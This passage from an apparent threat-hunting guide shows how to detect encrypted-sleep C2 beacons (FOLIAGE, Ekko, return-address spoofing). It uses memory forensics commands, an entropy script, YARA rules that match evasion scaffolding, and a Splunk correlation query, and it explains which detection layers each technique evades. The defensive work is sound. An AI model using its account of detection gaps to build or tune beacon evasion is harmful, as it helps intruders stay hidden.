// PE-sieve: checks return addresses of all threads in addition to memory attributes
pe-sieve64.exe /pid [suspected_pid] /shellc /data 3
// /shellc enables shellcode heuristic scanning in private regions
// /data 3 dumps suspicious regions to disk
// Catches return addresses in private commit even when memory is currently encrypted

// Volatility3 post-mortem: VAD analysis on memory dump
python3 vol.py -f memory.raw windows.vadinfo --pid [pid]
// Look for: VadS (private) entries with ExecuteWrite or Execute permissions
// The beacon VAD record persists regardless of current protection state

python3 vol.py -f memory.raw windows.malfind
// Looks for private execute memory with unusual content
// During encrypted sleep: shows high-entropy content in private execute VAD
// Entropy > 7.5 in an executable private region = likely encrypted payload

// Python: entropy check on dumped region
import math
def shannon_entropy(data):
    if not data: return 0.0
    freq = {}
    for b in data:
        freq[b] = freq.get(b, 0) + 1
    total = len(data)
    return -sum((c/total) * math.log2(c/total) for c in freq.values())

with open("dumped_private_exec_region.bin", "rb") as f:
    data = f.read()
print(f"Entropy: {shannon_entropy(data):.4f}")
# Normal code: 5.0 - 6.5
# Encrypted payload: 7.5 - 8.0

YARA rules targeting sleep kit scaffolding rather than beacon content

YARA rules targeting beacon content fail during sleep because the content is encrypted. Rules targeting the sleep kit scaffolding can survive because the scaffolding must be present and functional throughout the sleep cycle. The KsecDD handle in FOLIAGE, the CreateTimerQueueTimer setup code in Ekko, the NtContinue dispatch mechanism, and the x64 return address spoofing stub are all either in image commit memory or must be present in recognizable form to function.

// YARA: target the scaffolding, not the encrypted beacon content

rule FOLIAGE_Sleep_Chain_Scaffolding {
    meta:
        author      = "Threat Hunter"
        description = "Detects FOLIAGE APC-based sleep obfuscation scaffolding"
        reference   = "Austin Hudson FOLIAGE, Kyle Avery DEF CON 30"
    strings:
        $ksecdd_path  = "\Device\KsecDD" wide
        $ksecdd_path2 = "\Device\KsecDD" ascii
        $apc_thread   = "NtQueueApcThread" ascii
        $ntcontinue   = "NtContinue" ascii
        $nttestalert  = "NtTestAlert" ascii
    condition:
        ($ksecdd_path or $ksecdd_path2) and $apc_thread and $ntcontinue and $nttestalert
}

rule Ekko_Timer_Sleep_Scaffolding {
    meta:
        author      = "Threat Hunter"
        description = "Detects Ekko timer-queue sleep obfuscation scaffolding"
        reference   = "C5pider Ekko, reversed from MDSec NightHawk"
    strings:
        $create_tqt   = "CreateTimerQueueTimer" ascii
        $sf032        = "SystemFunction032" ascii
        $ntcontinue   = "NtContinue" ascii
        $wt_flag      = { 20 00 00 00 00 00 00 00 }
    condition:
        $create_tqt and $sf032 and $ntcontinue and $wt_flag
}

rule x64_ReturnAddr_Spoofing_Stub {
    meta:
        author      = "Threat Hunter"
        description = "At-execution return address spoofing stub from namazso PoC"
        reference   = "Used in AceLdr for MalMemDetect bypass"
    strings:
        $stub_entry = { 41 5B 48 83 C4 08 4C 8B 54 24 18 }
        $fixup_lea  = { 48 8D 1D ?? ?? ?? ?? }
    condition:
        $stub_entry and $fixup_lea
}

Correlating detections: how the layers combine

No single detection layer covers every variant at every point in the sleep cycle. ETW page protection events cover FOLIAGE and Ekko reliably but require a deployed ETW pipeline. Hunt-Sleeping-Beacons catches both via their respective call stack signatures but can be defeated by a correct implementation of at-execution spoofing during the sleep chain. MalMemDetect catches the active execution phase but is defeated by at-execution return address spoofing. Memory attribute scanning catches the execution phase but misses the sleep window for Ekko. YARA covers the scaffolding regardless of sleep state but only when the memory is readable.

The invariant that covers everything is page protection transitions logged by ETW, because it fires in kernel mode on every NtProtectVirtualMemory call and cannot be intercepted or suppressed by any user-mode technique. Any implementation in the Gargoyle lineage must change page protections. Logging those changes, correlating same-process same-address rapid cycling at consistent intervals, and investigating the owning process is the detection that survives the full evasion stack.

// Correlation query: combine ETW and thread state data in Splunk
// Finds processes with both page cycling and UserRequest wait anomalies

index=etw_kernel EventID=98
| eval transition = old_prot . "->" . new_prot
| where transition IN ("32->4","4->32","32->1","1->32")
| bin _time span=60s
| stats
    dc(transition) as unique_transitions,
    values(transition) as transitions,
    values(address) as addresses
    by _time, pid, image_name
| where unique_transitions >= 2
| join pid [
    search index=sysmon EventCode=8 OR EventCode=10
    | stats count as thread_events by pid
]
| where thread_events > 0
| eval confidence = case(
    unique_transitions >= 4 AND thread_events > 0, "HIGH",
    unique_transitions >= 2 AND thread_events > 0, "MEDIUM",
    true(), "LOW"
)
| table _time, pid, image_name, confidence, transitions, addresses
| sort -confidence, -_time

The practical triage sequence when ETW flags a process: first, capture a full memory dump with ProcDump before touching anything else. The dump preserves the key material, CONTEXT chain, and scaffolding regardless of whether the beacon is currently active or sleeping. Second, check Hunt-Sleeping-Beacons output against the flagged PID to see which sleep technique is in use and confirm it is the right process. Third, run YARA against the dump to identify the specific implementation and extract C2 configuration. If the beacon is currently encrypted, note the private commit VAD addresses from Moneta, wait for the next active window, and then run strings extraction against those regions to recover C2 infrastructure. The RC4 key for Ekko implementations is in a separate allocation near the beacon code region, persists through the sleep cycle, and can be used to decrypt a dump captured during the sleep window.